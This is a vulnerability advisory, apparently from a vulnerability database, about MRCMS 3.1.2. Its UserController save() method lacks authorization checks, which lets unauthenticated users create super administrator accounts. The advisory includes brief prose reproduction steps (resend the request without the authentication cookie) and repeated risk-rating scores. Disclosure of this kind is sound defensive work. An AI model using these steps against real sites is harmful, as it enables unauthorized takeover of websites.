Primary

Context

MRCMS Access Control Vulnerability Allowing Unauthorized Super Administrator Account Creation

Vulnerability

An access control vulnerability exists in MRCMS version 3.1.2. The issue arises in the UserController's save() method, which fails to implement proper authorization checks. This flaw allows unauthorized users to add super administrator accounts directly, without authentication, potentially leading to complete compromise of the website.

Impact

Exploitation of this vulnerability allows for the unauthorized creation of super administrator accounts, which could be used to gain full control over the MRCMS website.

Reproduction

To reproduce this vulnerability, intercept a request to the user management interface using Burp Suite. Remove the authentication cookie from the request and resend it. The super administrator account will be created successfully, without authentication.

Added: Apr 7, 2026, 7:10 PM

Updated: Apr 7, 2026, 7:10 PM

Vulnerability Rating

Custom Algorithm

spread

1.0

impact

5.0

exploitability

9.7

remediation

0.0

relevance

5.4

threat

6.4

urgency

2.9

incentive

8.3

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Vulnerability Rating

Custom Algorithm

spread

1.0

impact

5.0

exploitability

9.7

remediation

0.0

relevance

5.4

threat

6.4

urgency

2.9

incentive

8.3

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

MRCMS Access Control Vulnerability Allowing Unauthorized Super Administrator Account Creation

Vulnerability

Impact

Reproduction

Affected Products

MRCMS

CVSS Scores

References

Vulnerability Rating

Vulnerability Rating